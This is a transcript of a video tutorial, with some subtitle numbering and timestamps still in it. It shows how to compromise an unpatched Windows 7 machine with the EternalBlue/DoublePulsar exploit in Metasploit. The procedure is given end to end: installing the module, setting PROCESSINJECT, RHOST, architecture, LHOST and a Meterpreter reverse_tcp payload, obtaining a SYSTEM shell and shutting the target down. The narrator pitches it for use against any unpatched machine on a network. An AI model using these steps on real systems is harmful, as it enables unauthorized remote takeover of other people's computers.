Hello everybody and welcome back. And finally we get to the EternalBlue exploit developed by the NSA. Now as I said before, this is an exploit for the Windows 7 machine, so you will need to download the Windows 7 machine first. Now the link where I downloaded it from is this one; I will just type it right here so you can use the same link. It comes with both the 64-bit and 32-bit versions. You can download any of those you want. Now I will not be going through the installation of Windows 7 since it is rather simple: you just follow the steps and it will work for you. The link where I downloaded it from is this one, so https://bit.ly/2wppApz. And if you go to that link, let us just let this load, it should give you an option to download both the 64-bit and 32-bit Windows 7 operating system. So here it is. As we can see, it will lead you to this page right here. You scroll down and you can choose either one of these two. It is the size of 3.09 gigabytes for the 64-bit, or the 32-bit version is 2.38 gigabytes. Now in this tutorial I will use the 64-bit version of Windows 7, but both of these will work as well. Now if you have, for example, a VirtualBox machine with Windows Server 2008, that one will work as well. So let's see how to get this to run.
So what you want to do, let me just zoom this in, if you go to the msfconsole you will see that there actually are already some EternalBlue exploits in it. But what we want to do is actually download one from GitHub, since that one will actually allow us to get the Meterpreter shell back. There is one called eternalblue in the Metasploit framework; it basically comes pre-installed. But that one only gives you back the command shell. It doesn't give you back the Meterpreter shell with all the options that Meterpreter comes with. So we want to get the most out of it, so we will download the EternalBlue DoublePulsar module from GitHub, and we will add it to the Metasploit framework database and we will be able to use it.

So if I search here, search eternalblue, you will see, now I need to unzoom this so it doesn't look this ugly, you will see that we have two auxiliary modules right here. One of them is a scanner, so basically it will scan the machine and check if the machine is vulnerable to the attack, and these three right here will actually attack the machine itself. So the first one works on Windows 7. The second one, well basically, if I use the eternalblue Windows 8 edition, copy and paste it, and then show targets for this, it says Windows 64.
Now if I show info as well, it will say that basically this also works on Windows 10, which I highly doubt. As we can see: "EternalBlue exploit for Windows 8, Windows 10 and Windows Server 2012 by sleepya. The exploit might fail and crash a target system depended on what is overwritten. The exploit support only x64 target, tested on Windows 2012." So it is tested on Windows 10, Windows 8.1 and Windows 2012. But if you show options, I might be doing something wrong, but the only required spot right here is set RHOST to 192.168.1.3, which is the IP address of my Windows 10 machine. Let me just check it out real quick. So type ifconfig, and we can see that .1.3 indeed is the IP address of my target machine.

Now as it says right here, this exploits on port 445, which by the installation of Windows 7, for example, already comes open by default. So most of the targets that actually didn't update their Windows 7 will still be vulnerable to this attack. Now about Windows 8 and Windows 10, I'm not really sure. Since, for example, if I run nmap -sV -p 445 on my Windows 10 machine, it will say that the port is open. It will give us the version, so the port really is open. But this exploit right here probably only works for the almost never updated Windows 10 machines.
Now I have the 445 port open, but if I just run exploit here, let me set the payload first. So set payload windows/x64/meterpreter/reverse_tcp, since my target is 64-bit. And I run this... and let me just check show options in order to see if I need to set up the LHOST, which is our IP address, which is from ifconfig, which is up there. And if I exploit, you will see that this won't really work. As it says right here, this exploit does not support this build. So this exploit right here is only for this certain type of build; it will not work on some Windows 10 machines. Well, on most of them it will not work, especially on those that regularly download their updates.

So, you can check these several EternalBlue exploits right here. Let me just search them once again, search eternalblue. You can check them if you want to, but what we want to do right now is download the extended one that will give us the Meterpreter shell. So let us do that right now. Go to Firefox, and where you want to go right now is search, basically on the Google search bar, eternalblue doublepulsar github. And it will lead us to the first link, which is ElevenPaths/Eternalblue-Doublepulsar-Metasploit. We want to download this module into the /root directory, so make sure that it is downloaded in the /root directory. We will do that right now.
What you want to do is the same thing as with the program that we used; so just copy the link, we will go over this. Then we cd /root, we print the working directory in order to make sure, and we git clone and then the EternalBlue DoublePulsar .git link. And this will clone the program for us in our repository. Make sure that it indeed is in the /root repository since by default, in the settings, it will check for that path. Now I will show you this later on, but for now just make sure that you downloaded it from the root directory. So if I just type pwd up here, /root, and ls, we can see that right now we have the EternalBlue in that repository.

Now the next thing you want to do, and for that I will just leave Metasploit for a second, so what you want to do is find your Metasploit path. So your Metasploit path, so just locate, type here locate metasploit-framework. Now it is in /usr/share, I believe. Yeah, it's in /usr/share. And what you want to do once you find it, you want to copy the two packages from the EternalBlue. So let me just change my directory to the program that we downloaded. You have this subdirectory right here, and you also have this right here. What you want to do with these two is you want to copy them to the modules in Metasploit framework, to the Windows exploits, then to the SMB exploits. So, let me just show you what I mean.
What we 89 00:08:31,979 --> 00:08:37,609 want to do is first change our directory to the usr/share/metasploit-framework, 90 00:08:37,610 --> 00:08:44,940 then LS, cd modules/. Change to to exploits first, 91 00:08:44,940 --> 00:08:52,140 then change to Windows, and then SMB. And right here we have all the modules or 92 00:08:52,140 --> 00:08:57,200 all the exploits for the SMB protocol. As you can see there are the other eternal 93 00:08:57,200 --> 00:09:01,730 blue protocols right here, here they are, and what we want to do is we want to add 94 00:09:01,730 --> 00:09:07,700 these two files right here to this directory. So we just cp /root/ 95 00:09:07,700 --> 00:09:11,570 eternalblue which is the path to our program, and let's first copy the 96 00:09:11,570 --> 00:09:18,230 directory. We want to copy it to usr/share/metasploit-framework/modules/exploits, 97 00:09:18,230 --> 00:09:25,520 and then to the windows, and then smb. And -r for the directory so it copies the 98 00:09:25,519 --> 00:09:29,389 directory. And if I just type here ls once again you can see it is right here. 99 00:09:29,390 --> 00:09:34,880 And we also want to copy, so let us use the same command, but instead we want to 100 00:09:34,880 --> 00:09:38,360 copy the eternalblue_doublepulsar 101 00:09:38,360 --> 00:09:45,290 .ruby. So we copy that one as well and we can see now they are both in 102 00:09:45,290 --> 00:09:52,040 this directory now. We will be able to access them within 103 00:09:52,040 --> 00:09:56,810 the Metasploit framework command line or msfconsole. Now before we 104 00:09:56,810 --> 00:10:00,980 start with that you need to make sure for one more thing that is running, and 105 00:10:00,980 --> 00:10:06,800 that is the wine program. If you don't know what wine is I explained it 106 00:10:06,800 --> 00:10:11,510 in some of the previous videos. I showed you how you can download it, and we also 107 00:10:11,510 --> 00:10:15,380 downloaded Python with wine. 
So make sure to check out that video if you do not have it. The Wine path is, let me just close this so it doesn't bother us, so the path is /root/.wine/drive_c. As we can see, if you remember from the previous videos, this is the path to our drive C folder, which is the virtual Windows C folder, which has basically Windows files. As we can see, Program Files (x86) and Program Files. Now it is also important to know your Wine path since we will need to specify it in the attack, in the target attacking.

So right now that we did all that, what you want to do is change to root, first of all, and then run msfconsole. Now we should be good to go and we should be able to use the eternalblue_doublepulsar exploit. So you will see how powerful this is. First of all, what you want to do is, in case you didn't, you want to install Windows 7, since this only works on Windows 7 and Server 2008. I already have it installed right here and I followed all the steps. And also make sure that after you install it, or not after, towards the end of the installation, it will ask you for the security measures of Windows 7. Make sure to add no security measures and to not update it, since if it performs all of the updates it will perform the update for EternalBlue as well, and then this will not work.
So, make sure at the end, it will prompt you with a question at the end asking that. You just make sure to not update at all and you will be good to go. So I will just start up my Windows 7. Hopefully nothing goes slow because I am running two virtual machines right now. I gave this one around 1.5 gigabytes of RAM, so we will see how that will go. I do not have a password so we will just let this log in.

And while that is going, we want to search exploit/windows, since that is the path, with smb, and eternalblue_doublepulsar. As we can see, if you tab it, it will automatically find it since we put it in the correct folder, or in the correct directory, which is the smb directory under windows, under exploits. So just click enter here. And if we clear the screen and show all available options, we can see the things that we need to specify in order to run this. Now make sure to notice that all of this is required, so all of these specifications are required. This is the reason why I told you that you copy the path into the root directory, since this is already preset for the root directory. Now you could have changed it, but it doesn't really matter at the moment. We have EternalBlue DoublePulsar in the root directory, which is good. If we just check that, so pwd, we are in the root directory, ls, and it still really is there. So that is good.
Now let's show our options once again. The next thing you want to specify is the process to inject. Now if you downloaded the 32-bit Windows 7 you should leave this process like this. If you have a 64-bit Windows 7 version, you should change it to lsass.exe or to explorer.exe. But the difference between these two is that explorer.exe won't give you the system privileges during the exploitation. So we want to actually use this one right here. As it says, it is for the 64-bit version. So we set PROCESSINJECT, and then we copy the process name, and then we paste it. So it will set the process for us. As you can see in show options, the process is currently set.

The RHOST is basically the same as in all the previous exploits. It is basically the IP address of your Windows 7 machine, so we will check that out right now. We have Windows 7 right here. If I go there and type cmd for the command prompt... it is a little bit slow since I'm running two machines at the time. But we will get used to it. So I just type ipconfig right here. The IP address of the Windows 7 machine is .1.5. So, we need to know that, set RHOST 192.168.1.5. Now that we set that, the next thing we want to change is the target architecture. The RPORT should stay on 445 since the SMB service port is 445.
But the target 160 00:14:56,160 --> 00:15:01,640 architecture we want to change in case we downloaded the X64 bit version, and 161 00:15:01,640 --> 00:15:07,770 we did. So we want to type here X64 instead of x86. Now if you downloaded once 162 00:15:07,770 --> 00:15:14,480 again the 32 bit version, you should leave this on x86. So set 163 00:15:14,480 --> 00:15:21,330 TARGETARCHITECTURE x64, and let's clear the screen and show our options once again 164 00:15:21,330 --> 00:15:26,250 to see if everything is good. The wine path is correct since wine is stored 165 00:15:26,250 --> 00:15:31,650 in /root/.wine/drive_c. Now the 166 00:15:31,650 --> 00:15:36,720 targets, let's see show targets, it will say 167 00:15:36,720 --> 00:15:42,570 the targets are all windows, basically, versions until Windows 7. So we can see 168 00:15:42,569 --> 00:15:47,369 that we have Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008 169 00:15:47,370 --> 00:15:52,530 and Windows 7 all packs. So, we select a target, so 170 00:15:52,529 --> 00:16:01,709 SET target 8. I believe it something like 171 00:16:01,709 --> 00:16:14,879 that. Or is it set targets, or possibly select target. Now I don't even 172 00:16:14,879 --> 00:16:28,949 know, I maybe forgot this. Let's see this one. Ok, doesn't even matter. So I don't 173 00:16:28,949 --> 00:16:33,149 know the syntax for this, but it is not really needed for us to type that in 174 00:16:33,149 --> 00:16:39,269 order for this work. So, show options. Basically, it is already set for 175 00:16:39,269 --> 00:16:44,359 windows 7, I don't know why I tried that, and right now we should be good to go. 176 00:16:44,360 --> 00:16:53,250 But, one more thing to do is to set the payload. Now be careful since the payload 177 00:16:53,250 --> 00:16:58,530 for Windows meterpreter reverse TCP will not work here if you have a 64-bit 178 00:16:58,529 --> 00:17:03,239 Windows 7 that you are attacking. 
But if you have a 32-bit Windows 7 that you're attacking, the Meterpreter reverse TCP will work. For the 64-bit we need to set the payload to be windows/x64/meterpreter/reverse_tcp. Since we are attacking Windows 7 64-bit, we need to have the Windows 64-bit Meterpreter shell. So show options, and we set the LHOST. So LHOST is our IP address, so 192.168.1.4, I believe. We clear the screen, and we run the attack. So exploit, and we let this run. As we can see, this is the entire attack, and just by typing exploit we should be able to get the Meterpreter session back. It is launching the attack, as we can see, EternalBlue, so this will take a few seconds. The attack is basically writing a DLL in /root/.wine/drive_c/eternal.dll, I believe, Eternal11.dll. And right now we should be able to get the Meterpreter shell back. Here it is. Launching DoublePulsar, we got this session back.

Now if you notice right here, if I just type getuid here, you will see that basically we got this session to be SYSTEM. So with a simple exploit command, without the target having to click on anything or download anything, we were able to exploit the target. So with this exploit you can exploit any target that is currently connected to the network that didn't update their Windows 7 for a long time.
Since this 197 00:18:42,580 --> 00:18:47,470 exploit is from I believe April 2017, anyone who didn't perform updates since 198 00:18:47,470 --> 00:18:52,180 then, and trust me there are a lot of people who did who didn't, you will be 199 00:18:52,180 --> 00:18:57,850 able to exploit them with the authority system privileges. And right now you can 200 00:18:57,850 --> 00:19:02,080 do basically anything that we did in a previous video. So, for example, if you 201 00:19:02,080 --> 00:19:08,500 wanted to you could just, let you just move this to the side, you could just shut 202 00:19:08,500 --> 00:19:12,960 down their PC, or perform persistence, or something like that. 203 00:19:12,960 --> 00:19:20,430 Now let us actually perform the persistence. 204 00:19:23,910 --> 00:19:28,300 I'm not sure why this...it doesn't even matter. What we will do is we will 205 00:19:28,300 --> 00:19:33,670 shut down the PC, so shut down, and you will see that this basically will shut 206 00:19:33,670 --> 00:19:38,080 down their PC. It will kill our meterpreter session of course, but we 207 00:19:38,080 --> 00:19:42,130 don't care. We can exploit the target whenever we want since the target 208 00:19:42,130 --> 00:19:45,460 doesn't have to click on anything. We basically can just do whatever we 209 00:19:45,460 --> 00:19:50,890 want to the target. So just click here exit, and we should be good to go. 210 00:19:50,890 --> 00:19:56,080 Now in the next video I will show you how you can create a persistent 211 00:19:56,080 --> 00:20:01,660 Metasploit or meterpreter reverse shell running on a target PC. Now by persistent 212 00:20:01,660 --> 00:20:06,370 I mean that whenever the target restarts their system you will be able to connect 213 00:20:06,370 --> 00:20:11,800 back to them as soon as they login. So that'll be about it for this video. I 214 00:20:11,800 --> 00:20:16,710 hope you enjoyed it and I hope I see you in the next one. Bye!